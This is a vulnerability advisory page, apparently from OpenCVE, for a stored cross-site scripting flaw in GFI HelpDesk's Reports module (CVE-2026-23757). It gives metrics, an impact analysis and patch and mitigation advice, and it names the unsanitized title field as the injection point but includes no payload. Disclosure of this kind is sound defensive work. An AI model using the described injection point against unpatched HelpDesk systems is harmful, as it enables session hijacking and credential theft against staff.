Description
GFI HelpDesk before 4.99.10 contains a stored cross-site scripting vulnerability in the Reports module where the title parameter is passed directly to SWIFT_Report::Create() without HTML sanitization. Attackers can inject arbitrary JavaScript into the report title field when creating or editing a report, and the payload executes when staff members view and click the affected report link in the Manage Reports interface.
Published: 2026-04-20
Score: 5.1 Medium
EPSS: n/a
KEV: No
Impact: Stored XSS
Action: Patch
AI Analysis

Impact

A stored cross‑site scripting vulnerability exists in the Reports module of GFI Software HelpDesk where the title field is accepted without sanitization and passed directly to the SWIFT_Report::Create() function. An attacker can embed arbitrary JavaScript in the title when creating or editing a report; the payload executes in the victim’s browser when a staff member views or clicks the report link in the Manage Reports interface. This client‑side injection can be used for phishing, credential theft, or session hijacking within the HelpDesk application.

Affected Systems

The vulnerability affects GFI Software HelpDesk releases prior to version 4.99.10. No other products or versions are listed as impacted.

Risk and Exploitability

The CVSS score of 5.1 indicates moderate severity. No EPSS data is available and the vulnerability is not listed in the CISA KEV catalog, implying that widespread exploitation has not been documented. The exploit requires a user with the ability to create or edit reports, so the attack is likely confined to internal staff or users who have already compromised staff accounts. Once accessed, the attacker can execute arbitrary JavaScript in the victim’s browser, compromising user data and potentially gaining further foothold inside the organization.

Generated by OpenCVE AI on April 20, 2026 at 20:42 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade HelpDesk to version 4.99.10 or later to eliminate the vulnerability.
  • If an upgrade cannot be deployed immediately, restrict the ability to create or edit reports to trusted users and closely monitor the report titles for malicious content.
  • Deploy a web application firewall or application‑level input filter that sanitizes or blocks script tags in the report title before it is stored, as an interim protection measure.

Generated by OpenCVE AI on April 20, 2026 at 20:42 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 20 Apr 2026 18:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 20 Apr 2026 18:00:00 +0000

Type Values Removed Values Added
Description GFI HelpDesk before 4.99.10 contains a stored cross-site scripting vulnerability in the Reports module where the title parameter is passed directly to SWIFT_Report::Create() without HTML sanitization. Attackers can inject arbitrary JavaScript into the report title field when creating or editing a report, and the payload executes when staff members view and click the affected report link in the Manage Reports interface.
Title GFI HelpDesk < 4.99.10 Stored XSS via Reports Module
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

cvssV4_0

{'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N'}

Subscriptions

No data.

cve-icon MITRE

Status: PUBLISHED

Assigner: VulnCheck

Published:

Updated: 2026-04-20T18:07:01.630Z

Reserved: 2026-01-15T18:42:20.938Z

Link: CVE-2026-23757

cve-icon Vulnrichment

Updated: 2026-04-20T18:06:57.576Z

cve-icon NVD

Status : Awaiting Analysis

Published: 2026-04-20T18:16:24.473

Modified: 2026-04-20T19:05:30.750

Link: CVE-2026-23757

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-20T20:45:16Z

Weaknesses